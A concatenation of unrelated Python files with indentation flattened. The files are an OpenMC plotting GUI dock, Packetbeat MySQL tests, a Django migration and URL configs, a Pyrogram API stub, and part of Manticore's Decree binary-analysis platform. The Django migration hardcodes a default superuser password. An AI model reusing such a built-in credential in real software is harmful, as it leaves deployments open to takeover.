def updateWidth(self):
self.widthBox.setValue(self.model.activeView.width)
def updateHeight(self):
self.heightBox.setValue(self.model.activeView.height)
def updateColorBy(self):
self.colorbyBox.setCurrentText(self.model.activeView.colorby)
if self.model.activeView.colorby != 'cell':
self.universeLevelBox.setEnabled(False)
else:
self.universeLevelBox.setEnabled(True)
def updateUniverseLevel(self):
self.universeLevelBox.setCurrentIndex(self.model.activeView.level + 1)
def updatePlotAlpha(self):
self.domainAlphaBox.setValue(self.model.activeView.domainAlpha)
def updatePlotVisibility(self):
self.visibilityBox.setChecked(self.model.activeView.domainVisible)
def updateOutlines(self):
self.outlinesBox.setChecked(self.model.activeView.outlines)
def updateBasis(self):
self.basisBox.setCurrentText(self.model.activeView.basis)
def updateAspectLock(self):
aspect_lock = bool(self.model.activeView.aspectLock)
self.ratioCheck.setChecked(aspect_lock)
self.vResBox.setDisabled(aspect_lock)
self.vResLabel.setDisabled(aspect_lock)
def updateHRes(self):
self.hResBox.setValue(self.model.activeView.h_res)
def updateVRes(self):
self.vResBox.setValue(self.model.activeView.v_res)
def revertToCurrent(self):
cv = self.model.currentView
self.xOrBox.setValue(cv.origin[0])
self.yOrBox.setValue(cv.origin[1])
self.zOrBox.setValue(cv.origin[2])
self.widthBox.setValue(cv.width)
self.heightBox.setValue(cv.height)
def resizeEvent(self, event):
self.main_window.resizeEvent(event)
hideEvent = showEvent = moveEvent = resizeEvent
class TallyDock(PlotterDock):
def __init__(self, model, font_metric, parent=None):
super().__init__(model, font_metric, parent)
self.setAllowedAreas(QtCore.Qt.RightDockWidgetArea)
# Dock maps for tally information
self.tally_map = {}
self.filter_map = {}
self.score_map = {}
self.nuclide_map = {}
# Tally selector
self.tallySelectorLayout = QFormLayout()
self.tallySelector = QComboBox(self)
self.tallySelector.currentTextChanged[str].connect(
self.main_window.editSelectedTally)
self.tallySelectorLayout.addRow(self.tallySelector)
self.tallySelectorLayout.setLabelAlignment(QtCore.Qt.AlignLeft)
self.tallySelectorLayout.setFieldGrowthPolicy(
QFormLayout.AllNonFixedFieldsGrow)
# Add selector to its own box
self.tallyGroupBox = QGroupBox('Selected Tally')
self.tallyGroupBox.setLayout(self.tallySelectorLayout)
# Create submit button
self.applyButton = QPushButton("Apply Changes")
self.applyButton.setMinimumHeight(self.font_metric.height() * 1.6)
self.applyButton.clicked.connect(self.main_window.applyChanges)
# Color options section
self.tallyColorForm = ColorForm(self.model, self.main_window, 'tally')
self.scoresGroupBox = Expander(title="Scores:")
self.scoresListWidget = QListWidget()
self.nuclidesListWidget = QListWidget()
# Main layout
self.dockLayout = QVBoxLayout()
self.dockLayout.addWidget(QLabel("Tallies"))
self.dockLayout.addWidget(HorizontalLine())
self.dockLayout.addWidget(self.tallyGroupBox)
self.dockLayout.addStretch()
self.dockLayout.addWidget(HorizontalLine())
self.dockLayout.addWidget(self.tallyColorForm)
self.dockLayout.addWidget(HorizontalLine())
self.dockLayout.addWidget(self.applyButton)
# Create widget for dock and apply main layout
self.scroll = QScrollArea()
self.scroll.setWidgetResizable(True)
self.widget = QWidget()
self.widget.setLayout(self.dockLayout)
self.scroll.setWidget(self.widget)
self.setWidget(self.scroll)
def _createFilterTree(self, spatial_filters):
av = self.model.activeView
tally = self.model.statepoint.tallies[av.selectedTally]
filters = tally.filters
# create a tree for the filters
self.treeLayout = QVBoxLayout()
self.filterTree = QTreeWidget()
self.treeLayout.addWidget(self.filterTree)
self.treeExpander = Expander("Filters:", layout=self.treeLayout)
self.treeExpander.expand() # start with filters expanded
header = QTreeWidgetItem(["Filters"])
self.filterTree.setHeaderItem(header)
self.filterTree.setItemHidden(header, True)
self.filterTree.setColumnCount(1)
self.filterTree.itemChanged.connect(self.updateFilters)
self.filter_map = {}
self.bin_map = {}
for tally_filter in filters:
filter_label = str(type(tally_filter)).split(".")[-1][:-2]
filter_item = QTreeWidgetItem(self.filterTree, (filter_label,))
self.filter_map[tally_filter] = filter_item
# make checkable
if not spatial_filters:
filter_item.setFlags(QtCore.Qt.ItemIsUserCheckable)
filter_item.setToolTip(0, "Only tallies with spatial filters are viewable.")
else:
filter_item.setFlags(filter_item.flags() | QtCore.Qt.ItemIsTristate | QtCore.Qt.ItemIsUserCheckable)
filter_item.setCheckState(0, QtCore.Qt.Unchecked)
# all mesh bins are selected by default and not shown in the dock
if isinstance(tally_filter, openmc.MeshFilter):
filter_item.setCheckState(0, QtCore.Qt.Checked)
filter_item.setFlags(QtCore.Qt.ItemIsUserCheckable)
filter_item.setToolTip(0, "All Mesh bins are selected automatically")
continue
def _bin_sort_val(bin):
if isinstance(bin, Iterable) and all([isinstance(val, float) for val in bin]):
return np.sum(bin)
else:
return bin
for bin in sorted(tally_filter.bins, key=_bin_sort_val):
item = QTreeWidgetItem(filter_item, [str(bin),])
if not spatial_filters:
item.setFlags(QtCore.Qt.ItemIsUserCheckable)
item.setToolTip(0, "Only tallies with spatial filters are viewable.")
else:
item.setFlags(item.flags() | QtCore.Qt.ItemIsUserCheckable)
item.setCheckState(0, QtCore.Qt.Unchecked)
bin = bin if not isinstance(bin, Iterable) else tuple(bin)
self.bin_map[tally_filter, bin] = item
# start with all filters selected if spatial filters are present
if spatial_filters:
filter_item.setCheckState(0, QtCore.Qt.Checked)
def selectFromModel(self):
cv = self.model.currentView
self.selectedTally(cv.selectedTally)
def selectTally(self, tally_label=None):
# using active view to populate tally options live
av = self.model.activeView
# reset form layout
for i in reversed(range(self.tallySelectorLayout.count())):
self.tallySelectorLayout.itemAt(i).widget().setParent(None)
# always re-add the tally selector to the layout
self.tallySelectorLayout.addRow(self.tallySelector)
self.tallySelectorLayout.addRow(HorizontalLine())
if tally_label is None or tally_label == "None" or tally_label == "":
av.selectedTally = None
self.score_map = None
self.nuclide_map = None
self.filter_map = None
av.tallyValue = "Mean"
else:
# get the tally
tally = self.model.statepoint.tallies[av.selectedTally]
# populate filters
filter_types = {type(f) for f in tally.filters}
spatial_filters = bool(filter_types.intersection(_SPATIAL_FILTERS))
if not spatial_filters:
self.filter_description = QLabel("(No Spatial Filters)")
self.tallySelectorLayout.addRow(self.filter_description)
self._createFilterTree(spatial_filters)
self.tallySelectorLayout.addRow(self.treeExpander)
self.tallySelectorLayout.addRow(HorizontalLine())
# value selection
self.tallySelectorLayout.addRow(QLabel("Value:"))
self.valueBox = QComboBox(self)
self.values = tuple(_TALLY_VALUES.keys())
for value in self.values:
self.valueBox.addItem(value)
self.tallySelectorLayout.addRow(self.valueBox)
self.valueBox.currentTextChanged[str].connect(
self.main_window.editTallyValue)
self.updateTallyValue()
if not spatial_filters:
self.valueBox.setEnabled(False)
self.valueBox.setToolTip("Only tallies with spatial filters are viewable.")
# scores
self.score_map = {}
self.scoresListWidget.itemClicked.connect(
self.main_window.updateScores)
self.score_map.clear()
self.scoresListWidget.clear()
sorted_scores = sorted(tally.scores)
# always put total first if present
if 'total' in sorted_scores:
idx = sorted_scores.index('total')
sorted_scores.insert(0, sorted_scores.pop(idx))
for score in sorted_scores:
ql = QListWidgetItem()
ql.setText(score.capitalize())
ql.setCheckState(QtCore.Qt.Unchecked)
if not spatial_filters:
ql.setFlags(QtCore.Qt.ItemIsUserCheckable)
else:
ql.setFlags(ql.flags() | QtCore.Qt.ItemIsUserCheckable)
ql.setFlags(ql.flags() & ~QtCore.Qt.ItemIsSelectable)
self.score_map[score] = ql
self.scoresListWidget.addItem(ql)
# select the first score item by default
for item in self.score_map.values():
item.setCheckState(QtCore.Qt.Checked)
break
self.updateScores()
self.scoresGroupBoxLayout = QVBoxLayout()
self.scoresGroupBoxLayout.addWidget(self.scoresListWidget)
self.scoresGroupBox = Expander("Scores:", layout=self.scoresGroupBoxLayout)
self.tallySelectorLayout.addRow(self.scoresGroupBox)
# nuclides
self.nuclide_map = {}
self.nuclidesListWidget.itemClicked.connect(self.main_window.updateNuclides)
self.nuclide_map.clear()
self.nuclidesListWidget.clear()
sorted_nuclides = sorted(tally.nuclides)
# always put total at the top
if 'total' in sorted_nuclides:
idx = sorted_nuclides.index('total')
sorted_nuclides.insert(0, sorted_nuclides.pop(idx))
for nuclide in sorted_nuclides:
ql = QListWidgetItem()
ql.setText(nuclide.capitalize())
ql.setCheckState(QtCore.Qt.Unchecked)
if not spatial_filters:
ql.setFlags(QtCore.Qt.ItemIsUserCheckable)
else:
ql.setFlags(ql.flags() | QtCore.Qt.ItemIsUserCheckable)
ql.setFlags(ql.flags() & ~QtCore.Qt.ItemIsSelectable)
self.nuclide_map[nuclide] = ql
self.nuclidesListWidget.addItem(ql)
# select the first nuclide item by default
for item in self.nuclide_map.values():
item.setCheckState(QtCore.Qt.Checked)
break
self.updateNuclides()
self.nuclidesGroupBoxLayout = QVBoxLayout()
self.nuclidesGroupBoxLayout.addWidget(self.nuclidesListWidget)
self.nuclidesGroupBox = Expander("Nuclides:", layout=self.nuclidesGroupBoxLayout)
self.tallySelectorLayout.addRow(self.nuclidesGroupBox)
def updateMinMax(self):
self.tallyColorForm.updateMinMax()
def updateTallyValue(self):
cv = self.model.currentView
idx = self.valueBox.findText(cv.tallyValue)
self.valueBox.setCurrentIndex(idx)
def updateSelectedTally(self):
cv = self.model.currentView
idx = 0
if cv.selectedTally:
idx = self.tallySelector.findData(cv.selectedTally)
self.tallySelector.setCurrentIndex(idx)
def updateFilters(self):
applied_filters = defaultdict(tuple)
for f, f_item in self.filter_map.items():
if type(f) == openmc.MeshFilter:
continue
filter_checked = f_item.checkState(0)
if filter_checked != QtCore.Qt.Unchecked:
selected_bins = []
for idx, b in enumerate(f.bins):
b = b if not isinstance(b, Iterable) else tuple(b)
bin_checked = self.bin_map[(f, b)].checkState(0)
if bin_checked == QtCore.Qt.Checked:
selected_bins.append(idx)
applied_filters[f] = tuple(selected_bins)
self.model.appliedFilters = applied_filters
def updateScores(self):
applied_scores = []
for score, score_box in self.score_map.items():
if score_box.checkState() == QtCore.Qt.CheckState.Checked:
applied_scores.append(score)
self.model.appliedScores = tuple(applied_scores)
if not applied_scores:
# if no scores are selected, enable all scores again
for score, score_box in self.score_map.items():
sunits = _SCORE_UNITS.get(score, _REACTION_UNITS)
empty_item = QListWidgetItem()
score_box.setFlags(empty_item.flags() | QtCore.Qt.ItemIsUserCheckable)
score_box.setFlags(empty_item.flags() & ~QtCore.Qt.ItemIsSelectable)
elif 'total' in applied_scores:
self.model.appliedScores = ('total',)
# if total is selected, disable all other scores
for score, score_box in self.score_map.items():
if score != 'total':
score_box.setFlags(QtCore.Qt.ItemIsUserCheckable)
score_box.setToolTip("De-select 'total' to enable other scores")
else:
# get units of applied scores
selected_units = _SCORE_UNITS.get(applied_scores[0], _REACTION_UNITS)
# disable scores with incompatible units
for score, score_box in self.score_map.items():
sunits = _SCORE_UNITS.get(score, _REACTION_UNITS)
if sunits != selected_units:
score_box.setFlags(QtCore.Qt.ItemIsUserCheckable)
score_box.setToolTip("Score is incompatible with currently selected scores")
else:
score_box.setFlags(score_box.flags() | QtCore.Qt.ItemIsUserCheckable)
score_box.setFlags(score_box.flags() & ~QtCore.Qt.ItemIsSelectable)
def updateNuclides(self):
applied_nuclides = []
for nuclide, nuclide_box in self.nuclide_map.items():
if nuclide_box.checkState() == QtCore.Qt.CheckState.Checked:
applied_nuclides.append(nuclide)
self.model.appliedNuclides = tuple(applied_nuclides)
if 'total' in applied_nuclides:
self.model.appliedNuclides = ['total',]
for nuclide, nuclide_box in self.nuclide_map.items():
if nuclide != 'total':
nuclide_box.setFlags(QtCore.Qt.ItemIsUserCheckable)
nuclide_box.setToolTip("De-select 'total' to enable other nuclides")
elif not applied_nuclides:
# if no nuclides are selected, enable all nuclides again
for nuclide, nuclide_box in self.nuclide_map.items():
empty_item = QListWidgetItem()
nuclide_box.setFlags(empty_item.flags() | QtCore.Qt.ItemIsUserCheckable)
nuclide_box.setFlags(empty_item.flags() & ~QtCore.Qt.ItemIsSelectable)
def update(self):
# update the color form
self.tallyColorForm.update()
if self.model.statepoint:
self.tallySelector.clear()
self.tallySelector.setEnabled(True)
self.tallySelector.addItem("None")
for idx, tally in enumerate(self.model.statepoint.tallies.values()):
if tally.name == "":
self.tallySelector.addItem('Tally {}'.format(tally.id), userData=tally.id)
else:
self.tallySelector.addItem('Tally {} "{}"'.format(tally.id, tally.name), userData=tally.id)
self.tally_map[idx] = tally
self.updateSelectedTally()
self.updateMinMax()
else:
self.tallySelector.clear()
self.tallySelector.setDisabled(True)
class ColorForm(QWidget):
"""
Class for handling a field with a colormap, alpha, and visibility
Attributes
----------
model : PlotModel
The model instance used when updating information on the form.
visibilityBox : QCheckBox
Indicator for whether or not the field should be visible
alphaBox : QDoubleSpinBox
Holds the alpha value for the displayed field data
colormapBox : QComboBox
Selector holding the name of the matplotlib colormap being used
dataIndicatorCheckBox : QCheckBox
Indicates whether or not the data indicator will appear on the colorbar
userMinMaxBox : QCheckBox
Indicates whether or not the user defined values in the min and max
will be used to set the bounds of the colorbar.
maxBox : ScientificDoubleSpinBox
Max value of the colorbar. If the userMinMaxBox is checked, this will be
the user's input. If the userMinMaxBox is not checked, this box will
hold the max value of the visible data.
minBox : ScientificDoubleSpinBox
Min value of the colorbar. If the userMinMaxBox is checked, this will be
the user's input. If the userMinMaxBox is not checked, this box will
hold the min value of the visible data.
scaleBox : QCheckBox
Indicates whether or not the data is displayed on a log or linear
scale
maskZeroBox : QCheckBox
Indicates whether or not values equal to zero are displayed
clipDataBox : QCheckBox
Indicates whether or not values outside the min/max are displayed
contoursBox : QCheckBox
Indicates whether or not data is displayed as contours
contourLevelsLine : QLineEdit
Controls the contours of the data. If this line contains a single
integer, that number of levels is used to display the data. If a
comma-separated set of values is entered, those values will be used as
levels in the contour plot.
"""
def __init__(self, model, main_window, field, colormaps=None):
super().__init__()
self.model = model
self.main_window = main_window
self.field = field
self.layout = QFormLayout()
# Visibility check box
self.visibilityBox = QCheckBox()
visible_connector = partial(main_window.toggleTallyVisibility)
self.visibilityBox.stateChanged.connect(visible_connector)
# Alpha value
self.alphaBox = QDoubleSpinBox()
self.alphaBox.setDecimals(2)
self.alphaBox.setRange(0, 1)
self.alphaBox.setSingleStep(0.05)
alpha_connector = partial(main_window.editTallyAlpha)
self.alphaBox.valueChanged.connect(alpha_connector)
# Color map selector
self.colormapBox = QComboBox()
if colormaps is None:
colormaps = sorted(m for m in mcolormaps.datad if not m.endswith("_r"))
for colormap in colormaps:
self.colormapBox.addItem(colormap)
cmap_connector = partial(main_window.editTallyDataColormap)
self.colormapBox.currentTextChanged[str].connect(cmap_connector)
# Data indicator line check box
self.dataIndicatorCheckBox = QCheckBox()
data_indicator_connector = partial(main_window.toggleTallyDataIndicator)
self.dataIndicatorCheckBox.stateChanged.connect(data_indicator_connector)
# User specified min/max check box
self.userMinMaxBox = QCheckBox()
minmax_connector = partial(main_window.toggleTallyDataUserMinMax)
self.userMinMaxBox.stateChanged.connect(minmax_connector)
# Data min spin box
self.minBox = ScientificDoubleSpinBox()
self.minBox.setMinimum(0.0)
min_connector = partial(main_window.editTallyDataMin)
self.minBox.valueChanged.connect(min_connector)
# Data max spin box
self.maxBox = ScientificDoubleSpinBox()
self.maxBox.setMinimum(0.0)
max_connector = partial(main_window.editTallyDataMax)
self.maxBox.valueChanged.connect(max_connector)
# Linear/Log scaling check box
self.scaleBox = QCheckBox()
scale_connector = partial(main_window.toggleTallyLogScale)
self.scaleBox.stateChanged.connect(scale_connector)
# Masking of zero values check box
self.maskZeroBox = QCheckBox()
zero_connector = partial(main_window.toggleTallyMaskZero)
self.maskZeroBox.stateChanged.connect(zero_connector)
# Clip data to min/max check box
self.clipDataBox = QCheckBox()
clip_connector = partial(main_window.toggleTallyDataClip)
self.clipDataBox.stateChanged.connect(clip_connector)
# Display data as contour plot check box
self.contoursBox = QCheckBox()
self.contoursBox.stateChanged.connect(main_window.toggleTallyContours)
self.contourLevelsLine = QLineEdit()
self.contourLevelsLine.textChanged.connect(
main_window.editTallyContourLevels)
# Organize widgets on layout
self.layout.addRow("Visible:", self.visibilityBox)
self.layout.addRow("Alpha: ", self.alphaBox)
self.layout.addRow("Colormap: ", self.colormapBox)
self.layout.addRow("Data Indicator: ", self.dataIndicatorCheckBox)
self.layout.addRow("Custom Min/Max: ", self.userMinMaxBox)
self.layout.addRow("Min: ", self.minBox)
self.layout.addRow("Max: ", self.maxBox)
self.layout.addRow("Log Scale: ", self.scaleBox)
self.layout.addRow("Clip Data: ", self.clipDataBox)
self.layout.addRow("Mask Zeros: ", self.maskZeroBox)
self.layout.addRow("Contours: ", self.contoursBox)
self.layout.addRow("Contour Levels:", self.contourLevelsLine)
self.setLayout(self.layout)
def updateTallyContours(self):
cv = self.model.currentView
self.contoursBox.setChecked(cv.tallyContours)
self.contourLevelsLine.setText(cv.tallyContourLevels)
def updateDataIndicator(self):
cv = self.model.currentView
self.dataIndicatorCheckBox.setChecked(cv.tallyDataIndicator)
def setMinMaxEnabled(self, enable):
enable = bool(enable)
self.minBox.setEnabled(enable)
self.maxBox.setEnabled(enable)
def updateMinMax(self):
cv = self.model.currentView
self.minBox.setValue(cv.tallyDataMin)
self.maxBox.setValue(cv.tallyDataMax)
self.setMinMaxEnabled(cv.tallyDataUserMinMax)
def updateTallyVisibility(self):
cv = self.model.currentView
self.visibilityBox.setChecked(cv.tallyDataVisible)
def updateMaskZeros(self):
cv = self.model.currentView
self.maskZeroBox.setChecked(cv.tallyMaskZeroValues)
def updateDataClip(self):
cv = self.model.currentView
self.clipDataBox.setChecked(cv.clipTallyData)
def update(self):
cv = self.model.currentView
# set colormap value in selector
cmap = cv.tallyDataColormap
idx = self.colormapBox.findText(cmap, QtCore.Qt.MatchFixedString)
self.colormapBox.setCurrentIndex(idx)
self.alphaBox.setValue(cv.tallyDataAlpha)
self.visibilityBox.setChecked(cv.tallyDataVisible)
self.userMinMaxBox.setChecked(cv.tallyDataUserMinMax)
self.scaleBox.setChecked(cv.tallyDataLogScale)
self.updateMinMax()
self.updateMaskZeros()
self.updateDataClip()
self.updateDataIndicator()
self.updateTallyContours()
|
py | 1a4a1243219461e0152a28a15c461ac9bddbead7 | from packetbeat import BaseTest
"""
Tests for trimming long results in mysql.
"""
class Test(BaseTest):
def test_default_settings(self):
"""
Should store the entire rows but only
10 rows with default settings.
"""
self.render_config_template(
mysql_ports=[3306],
mysql_send_response=True
)
self.run_packetbeat(pcap="mysql_long_result.pcap")
objs = self.read_output()
assert len(objs) == 1
res = objs[0]
assert res["mysql.num_rows"] == 15
lines = res["response"].strip().split("\n")
assert len(lines) == 11 # 10 plus header
for line in lines[3:]:
print len(line)
assert len(line) == 261
def test_max_row_length(self):
"""
Should be able to cap the row length.
"""
self.render_config_template(
mysql_ports=[3306],
mysql_max_row_length=79,
mysql_send_response=True
)
self.run_packetbeat(pcap="mysql_long_result.pcap",
debug_selectors=["mysqldetailed"])
objs = self.read_output()
assert len(objs) == 1
res = objs[0]
assert res["mysql.num_rows"] == 15
lines = res["response"].strip().split("\n")
assert len(lines) == 11 # 10 plus header
for line in lines[3:]:
assert len(line) == 81 # 79 plus two separators
def test_max_rows(self):
"""
Should be able to cap the number of rows
"""
self.render_config_template(
mysql_ports=[3306],
mysql_max_row_length=79,
mysql_max_rows=5,
mysql_send_response=True
)
self.run_packetbeat(pcap="mysql_long_result.pcap",
debug_selectors=["mysqldetailed"])
objs = self.read_output()
assert len(objs) == 1
res = objs[0]
assert res["mysql.num_rows"] == 15
lines = res["response"].strip().split("\n")
assert len(lines) == 6 # 5 plus header
for line in lines[3:]:
assert len(line) == 81 # 79 plus two separators
def test_larger_max_rows(self):
"""
Should be able to cap the number of rows
"""
self.render_config_template(
mysql_ports=[3306],
mysql_max_rows=2000,
mysql_send_response=True
)
self.run_packetbeat(pcap="mysql_long_result.pcap",
debug_selectors=["mysqldetailed"])
objs = self.read_output()
assert len(objs) == 1
res = objs[0]
assert res["mysql.num_rows"] == 15
lines = res["response"].strip().split("\n")
assert len(lines) == 16 # 15 plus header
def test_larger_than_100k(self):
"""
Should work for MySQL messages larger than 100k bytes.
"""
self.render_config_template(
mysql_ports=[3306],
mysql_send_response=True
)
self.run_packetbeat(pcap="mysql_long.pcap",
debug_selectors=["mysqldetailed"])
objs = self.read_output()
assert len(objs) == 1
res = objs[0]
assert res["mysql.num_rows"] == 400
|
py | 1a4a12e8a8f8bf0b2b388e6ac629f0dfebacd1d6 | PROJECT_NAME = 'Olympus Programming'
DEBUG_PROJECT_NAME = 'Coursework'
IP = '185.255.132.221'
PORT = '80'
WORKING_DIRECTORY = '/root/project' # Only for server
LOCAL_WORKING_DIRECTORY = 'G://Projects/Coursework' # On my pc
solution_lang = {
'GNU GCC C99': 'c',
'GNU G++ 17': 'cpp',
# 'Kotlin': 'kt',
'Python 3': 'py',
'PyPy': 'pypy',
# 'Ruby 2.7': 'rb',
}
verdict = {
True: 'Правильное решение',  # "Correct solution"
# Codes of status of task checking:
# WANNA ENUM...
# But I am too lazy to use it
'process': 'Выполняется проверка',  # "Checking in progress"
}
valid_image_formats = [
'png',
'jpg',
'jpeg',
]
annotation = {
'task_manager': {
'package': 'It must be a class inherited from the class SolutionCaseBase',
'task': 'It must be a class inherited from the class TaskBase',
'tests': 'It must be a class inherited from the class TestBase',
}
}
|
py | 1a4a1300142d69ccd1207655956a42886892d662 | from selenium.webdriver.support.wait import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC
from selenium.webdriver.common.by import By
class BlockCartPage:
def __init__(self, driver):
self.driver = driver
self.wait = WebDriverWait(driver, 10)
def wait_adding_prod_to_cart(self, text):
self.wait.until(EC.text_to_be_present_in_element((By.CSS_SELECTOR,'div#cart span.quantity'), text))
@property
def cart_link_button(self):
return self.driver.find_element_by_css_selector("div#cart a.link")
|
py | 1a4a13f0a6b44644bf127275880d9c0e72461911 | # -*- coding: utf-8 -*-
#
from django.contrib.auth.hashers import make_password
from django.db import migrations, models
def add_default_admin(apps, schema_editor):
user_model = apps.get_model("auth", "User")
db_alias = schema_editor.connection.alias
user_model.objects.using(db_alias).create(
username="admin",
email="[email protected]",
password=make_password("kubeoperator@admin123"),
is_superuser=True,
is_staff=True
)
class Migration(migrations.Migration):
initial = True
dependencies = [
('auth', '0008_alter_user_username_max_length'),
]
operations = [
migrations.RunPython(add_default_admin),
]
|
py | 1a4a14f22fd66780a4b7977365fcb88cae5f8feb | """server URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/2.1/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.contrib import admin
from django.urls import path
urlpatterns = [
path('admin/', admin.site.urls),
]
|
py | 1a4a151e59b0972ad9dedadde7ab3e946b2d9667 | """config URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/3.1/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.contrib import admin
from django.urls import path, include
urlpatterns = [
path('', include('index.urls')),
path('admin/', admin.site.urls),
path('users/', include('accounts.urls')),
path('board/', include('board.urls')),
path('posts/', include('posts.urls')),
path('search/', include('search.urls')),
# path('rest-auth/', include('rest_auth.urls')),
# path('rest-auth/signup/', include('rest_auth.registration.urls')),
]
|
py | 1a4a15727d1c20622d9ebde45345f557fd2a7153 | # Pyrogram - Telegram MTProto API Client Library for Python
# Copyright (C) 2017-2021 Dan <https://github.com/delivrance>
#
# This file is part of Pyrogram.
#
# Pyrogram is free software: you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License as published
# by the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Pyrogram is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with Pyrogram. If not, see <http://www.gnu.org/licenses/>.
from io import BytesIO
from pyrogram.raw.core.primitives import Int, Long, Int128, Int256, Bool, Bytes, String, Double, Vector
from pyrogram.raw.core import TLObject
from pyrogram import raw
from typing import List, Union, Any
# # # # # # # # # # # # # # # # # # # # # # # #
# !!! WARNING !!! #
# This is a generated file! #
# All changes made in this file will be lost! #
# # # # # # # # # # # # # # # # # # # # # # # #
class CancelPasswordEmail(TLObject): # type: ignore
"""Telegram API method.
Details:
- Layer: ``126``
- ID: ``0xc1cbd5b6``
**No parameters required.**
Returns:
``bool``
"""
__slots__: List[str] = []
ID = 0xc1cbd5b6
QUALNAME = "functions.account.CancelPasswordEmail"
def __init__(self) -> None:
pass
@staticmethod
def read(data: BytesIO, *args: Any) -> "CancelPasswordEmail":
# No flags
return CancelPasswordEmail()
def write(self) -> bytes:
data = BytesIO()
data.write(Int(self.ID, False))
# No flags
return data.getvalue()
|
py | 1a4a17dcfc586dac613d4e8cc78acc7f79410a61 | import cgcrandom
# TODO use cpu factory
from ..core.cpu.x86 import I386Cpu
from ..core.cpu.abstractcpu import Interruption, Syscall, ConcretizeRegister, ConcretizeArgument
from ..core.memory import SMemory32, Memory32
from ..core.smtlib import *
from ..core.executor import TerminateState
from ..utils.helpers import issymbolic
from ..binary import CGCElf
from ..platforms.platform import Platform
import logging
import random
logger = logging.getLogger(__name__)
class RestartSyscall(Exception):
pass
class Deadlock(Exception):
pass
class SymbolicSyscallArgument(ConcretizeRegister):
def __init__(self, cpu, number, message='Concretizing syscall argument', policy='SAMPLED'):
reg_name = ['EBX', 'ECX', 'EDX', 'ESI', 'EDI', 'EBP'][number]
super(SymbolicSyscallArgument, self).__init__(cpu, reg_name, message, policy)
class Socket(object):
@staticmethod
def pair():
a = Socket()
b = Socket()
a.connect(b)
return a, b
def __init__(self):
self.buffer = []  # queue of bytes
self.peer = None
def __repr__(self):
return "SOCKET(%x, %r, %x)" % (hash(self), self.buffer, hash(self.peer))
def is_connected(self):
return self.peer is not None
def is_empty(self):
return len(self.buffer) == 0
def is_full(self):
return len(self.buffer) > 2 * 1024
def connect(self, peer):
assert not self.is_connected()
assert not peer.is_connected()
self.peer = peer
if peer.peer is None:
peer.peer = self
def receive(self, size):
rx_bytes = min(size, len(self.buffer))
ret = []
for i in xrange(rx_bytes):
ret.append(self.buffer.pop())
return ret
def transmit(self, buf):
assert self.is_connected()
return self.peer._transmit(buf)
def _transmit(self, buf):
for c in buf:
self.buffer.insert(0, c)
return len(buf)
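# Illustrative usage sketch (not part of the original module): Socket.pair()
# returns two connected endpoints; bytes transmitted on one side are queued
# FIFO on the peer and drained by receive().
#
#   a, b = Socket.pair()
#   a.transmit("hi")
#   assert b.receive(2) == ['h', 'i']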
class Decree(Platform):
'''
A simple Decree Operating System.
This class emulates the most common Decree system calls
'''
CGC_EBADF = 1
CGC_EFAULT = 2
CGC_EINVAL = 3
CGC_ENOMEM = 4
CGC_ENOSYS = 5
CGC_EPIPE = 6
CGC_SSIZE_MAX = 2147483647
CGC_SIZE_MAX = 4294967295
CGC_FD_SETSIZE = 32
def __init__(self, programs, **kwargs):
'''
Builds a Decree OS
:param cpus: CPU for this platform
:param mem: memory for this platform
:todo: generalize for more CPUs
:todo: fix deps?
'''
programs = programs.split(",")
super(Decree, self).__init__(path=programs[0], **kwargs)
self.clocks = 0
self.files = []
self.syscall_trace = []
self.files = []
# open standard files stdin, stdout, stderr
logger.info("Opening file descriptors (0,1,2)")
self.input = Socket()
self.output = Socket()
stdin = Socket()
stdout = Socket()
stderr = Socket()
# A transmit to stdin,stdout or stderr will be directed to out
stdin.peer = self.output
stdout.peer = self.output
stderr.peer = self.output
# A receive from stdin will get data from inp
self.input.peer = stdin
# A receive on stdout or stderr will return no data (rx_bytes: 0)
assert self._open(stdin) == 0
assert self._open(stdout) == 1
assert self._open(stderr) == 2
# Load process and setup socketpairs
self.procs = []
for program in programs:
self.procs += self.load(program)
socka, sockb = Socket.pair()
self._open(socka)
self._open(sockb)
nprocs = len(self.procs)
nfiles = len(self.files)
assert nprocs > 0
self.running = range(nprocs)
self._current = 0
# Each process can wait for one timeout
self.timers = [None] * nprocs
# each fd has a waitlist
self.rwait = [set() for _ in xrange(nfiles)]
self.twait = [set() for _ in xrange(nfiles)]
# Install event forwarders
for proc in self.procs:
self.forward_events_from(proc)
def _mk_proc(self):
return I386Cpu(Memory32())
@property
def current(self):
return self.procs[self._current]
def __getstate__(self):
state = super(Decree, self).__getstate__()
state['clocks'] = self.clocks
state['input'] = self.input.buffer
state['output'] = self.output.buffer
state['files'] = [x.buffer for x in self.files]
state['procs'] = self.procs
state['current'] = self._current
state['running'] = self.running
state['rwait'] = self.rwait
state['twait'] = self.twait
state['timers'] = self.timers
state['syscall_trace'] = self.syscall_trace
return state
def __setstate__(self, state):
"""
:todo: some asserts
:todo: fix deps? (last line)
"""
super(Decree, self).__setstate__(state)
self.input = Socket()
self.input.buffer = state['input']
self.output = Socket()
self.output.buffer = state['output']
self.files = []
for buf in state['files']:
f = Socket()
f.buffer = buf
self.files.append(f)
for fd in range(len(self.files)):
if self.connections(fd) is not None:
self.files[fd].peer = self.files[self.connections(fd)]
self.files[0].peer = self.output
self.files[1].peer = self.output
self.files[2].peer = self.output
self.input.peer = self.files[0]
self.procs = state['procs']
self._current = state['current']
self.running = state['running']
